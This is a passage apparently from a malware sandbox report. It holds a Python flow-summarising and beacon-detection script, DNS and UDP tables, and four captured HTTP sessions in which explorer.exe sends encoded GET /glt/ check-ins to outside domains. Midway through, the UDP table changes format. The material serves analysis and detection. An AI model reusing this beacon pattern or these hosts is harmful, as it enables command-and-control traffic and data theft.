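    m = TS_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    frac = int(m.group(2)[:6].ljust(6, "0"))
    return datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S").replace(microsecond=frac)


def parse_packets(text: str) -> list:
    rows = []
    for line in text.splitlines():
        if line.strip():
            ts, sport, dport, src, dst = (f.strip() for f in line.split("|"))
            rows.append({"ts": parse_ts(ts), "sport": int(sport), "dport": int(dport),
                         "src": src, "dst": dst})
    return rows


def summarise_flows(rows: list, local: str = "192.168.2.3") -> list:
    """Group packets into (local port, remote ip, remote port) flows, ordered by first packet."""
    flows = {}
    for r in rows:
        outbound = r["src"] == local
        key = (r["sport"], r["dst"], r["dport"]) if outbound else (r["dport"], r["src"], r["sport"])
        f = flows.setdefault(key, {"local_port": key[0], "remote": key[1], "remote_port": key[2],
                                   "first": r["ts"], "last": r["ts"], "out": 0, "in": 0})
        f["first"], f["last"] = min(f["first"], r["ts"]), max(f["last"], r["ts"])
        f["out" if outbound else "in"] += 1
    for f in flows.values():
        f["duration_s"] = (f["last"] - f["first"]).total_seconds()
    return sorted(flows.values(), key=lambda f: f["first"])


def http_fanout(flows: list, window_s: float = 60.0, min_hosts: int = 3,
                max_duration_s: float = 5.0) -> list:
    """Remote hosts in any window in which the local host opened short port-80 sessions
    to at least min_hosts distinct servers: the check-in pattern of a bot walking a list."""
    cand = [f for f in flows if f["remote_port"] == 80 and f["duration_s"] <= max_duration_s]
    hits = []
    for i, start in enumerate(cand):
        hosts = []
        for f in cand[i:]:
            if (f["first"] - start["first"]).total_seconds() > window_s:
                break
            if f["remote"] not in hosts:
                hosts.append(f["remote"])
        if len(hosts) >= min_hosts:
            for h in hosts:
                if h not in hits:
                    hits.append(h)
    return hits


def flow_for_alert(flows: list, alert: dict, local: str = "192.168.2.3"):
    """Find the flow an IDS alert belongs to, whichever direction the alerting packet had."""
    a = alert
    key = ((a["sport"], a["dst"], a["dport"]) if a["src"] == local
           else (a["dport"], a["src"], a["sport"]))
    return next((f for f in flows if (f["local_port"], f["remote"], f["remote_port"]) == key), None)
```

The same flow keys work for the UDP list below: each TCP session is preceded within about 150 ms by a query to 8.8.8.8 (20:05:26.419 before 49728, 20:05:47.008 before 49737), so a resolver log or the DNS payloads are where the contacted hostnames would be recovered; the packet list alone does not show them.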

UDP Packets

Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
Nov 20, 2020 20:04:27.174336910 CET | 49199 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:27.201273918 CET | 53 | 49199 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:28.409771919 CET | 50620 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:28.445518970 CET | 53 | 50620 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:29.263453007 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:29.299217939 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:30.287308931 CET | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:30.323168039 CET | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:31.344918013 CET | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:31.371900082 CET | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:32.375833035 CET | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:32.411385059 CET | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:33.312665939 CET | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:33.339875937 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:34.131174088 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:34.166830063 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:37.789849997 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:37.816962004 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:42.357013941 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:42.384237051 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:42.432178974 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:42.467820883 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:45.847429037 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:45.874659061 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:46.653862953 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:46.689718008 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:47.502192020 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:47.529350042 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:48.451488972 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:48.478710890 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:49.907897949 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:49.935122967 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:50.950056076 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:50.985755920 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:51.852180004 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:51.879240990 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:52.744124889 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:52.771322966 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:54.259608984 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:54.286655903 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:55.150151014 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:55.177166939 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:04:56.516977072 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:04:56.544198036 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:05:13.104862928 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:05:13.131953001 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:05:13.430130005 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:05:13.457263947 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:05:26.419954062 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:05:26.563220978 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:05:30.900866032 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:05:30.927938938 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:05:36.146415949 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Nov 20, 2020 20:05:36.184793949 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Nov 20, 2020 20:05:47.008040905 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8
                                                    Nov 20, 2020 20:05:47.198796034 CET53561328.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:06:06.429137945 CET5898753192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:06:06.456185102 CET53589878.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:06:07.502074003 CET5657953192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:06:07.637175083 CET53565798.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:06:07.774087906 CET6063353192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:06:07.801172018 CET53606338.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:06:28.238503933 CET6129253192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:06:28.276519060 CET53612928.8.8.8192.168.2.3

                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 20, 2020 20:05:26.419954062 CET | 192.168.2.3 | 8.8.8.8 | 0x1b37 | Standard query (0) | www.tessuto.net | A (IP address) | IN (0x0001)
Nov 20, 2020 20:05:47.008040905 CET | 192.168.2.3 | 8.8.8.8 | 0x6e50 | Standard query (0) | www.reem.pro | A (IP address) | IN (0x0001)
Nov 20, 2020 20:06:07.502074003 CET | 192.168.2.3 | 8.8.8.8 | 0x8650 | Standard query (0) | www.themaskedstitcher.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:06:28.238503933 CET | 192.168.2.3 | 8.8.8.8 | 0xd8e | Standard query (0) | www.auctionpros.club | A (IP address) | IN (0x0001)

                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 20, 2020 20:05:26.563220978 CET | 8.8.8.8 | 192.168.2.3 | 0x1b37 | No error (0) | www.tessuto.net | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 20:05:26.563220978 CET | 8.8.8.8 | 192.168.2.3 | 0x1b37 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | - | 3.138.72.189 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:05:26.563220978 CET | 8.8.8.8 | 192.168.2.3 | 0x1b37 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | - | 3.12.202.18 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:05:26.563220978 CET | 8.8.8.8 | 192.168.2.3 | 0x1b37 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | - | 3.134.22.63 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:05:47.198796034 CET | 8.8.8.8 | 192.168.2.3 | 0x6e50 | No error (0) | www.reem.pro | reem.pro | - | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 20:05:47.198796034 CET | 8.8.8.8 | 192.168.2.3 | 0x6e50 | No error (0) | reem.pro | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:06:07.637175083 CET | 8.8.8.8 | 192.168.2.3 | 0x8650 | No error (0) | www.themaskedstitcher.com | ext-cust.squarespace.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 20:06:07.637175083 CET | 8.8.8.8 | 192.168.2.3 | 0x8650 | No error (0) | ext-cust.squarespace.com | - | 198.49.23.141 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:06:07.637175083 CET | 8.8.8.8 | 192.168.2.3 | 0x8650 | No error (0) | ext-cust.squarespace.com | - | 198.185.159.141 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:06:07.637175083 CET | 8.8.8.8 | 192.168.2.3 | 0x8650 | No error (0) | ext-cust.squarespace.com | - | 198.49.23.141 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:06:07.637175083 CET | 8.8.8.8 | 192.168.2.3 | 0x8650 | No error (0) | ext-cust.squarespace.com | - | 198.185.159.141 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:06:28.276519060 CET | 8.8.8.8 | 192.168.2.3 | 0xd8e | No error (0) | www.auctionpros.club | auctionpros.club | - | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 20:06:28.276519060 CET | 8.8.8.8 | 192.168.2.3 | 0xd8e | No error (0) | auctionpros.club | - | 162.0.232.118 | A (IP address) | IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.tessuto.net
                                                    • www.reem.pro
                                                    • www.themaskedstitcher.com
                                                    • www.auctionpros.club

                                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49728 | 3.138.72.189 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 20:05:26.687122107 CET | 657 | OUT | GET /glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4 HTTP/1.1
                                                    Host: www.tessuto.net
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
Nov 20, 2020 20:05:26.800371885 CET | 658 | IN | HTTP/1.1 404 Not Found
                                                    Date: Fri, 20 Nov 2020 19:05:26 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 153
                                                    Connection: close
                                                    Server: nginx/1.16.1
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49737 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 20:05:47.218628883 CET | 5031 | OUT | GET /glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh HTTP/1.1
                                                    Host: www.reem.pro
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
Nov 20, 2020 20:05:47.333897114 CET | 5032 | IN | HTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Fri, 20 Nov 2020 19:05:47 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "5fb7c9ca-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49739 | 198.49.23.141 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 20:06:07.740803957 CET | 5046 | OUT | GET /glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP HTTP/1.1
                                                    Host: www.themaskedstitcher.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
Nov 20, 2020 20:06:07.845019102 CET | 5048 | IN | HTTP/1.1 400 Bad Request
                                                    content-length: 77564
                                                    expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                    pragma: no-cache
                                                    cache-control: no-cache, must-revalidate
                                                    content-type: text/html; charset=UTF-8
                                                    connection: close
                                                    date: Fri, 20 Nov 2020 19:06:07 UTC
                                                    x-contextid: P1FGM9Sl/6DPVlN07
                                                    server: Squarespace
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 
20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                    Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49741 | 162.0.232.118 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 20:06:28.447581053 CET | 5134 | OUT | GET /glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh HTTP/1.1
                                                    Host: www.auctionpros.club
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
Nov 20, 2020 20:06:28.654195070 CET | 5136 | IN | HTTP/1.1 404 Not Found
                                                    Date: Fri, 20 Nov 2020 19:06:28 GMT
                                                    Server: Apache
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html
                                                    Connection: close
                                                    Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 
20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61
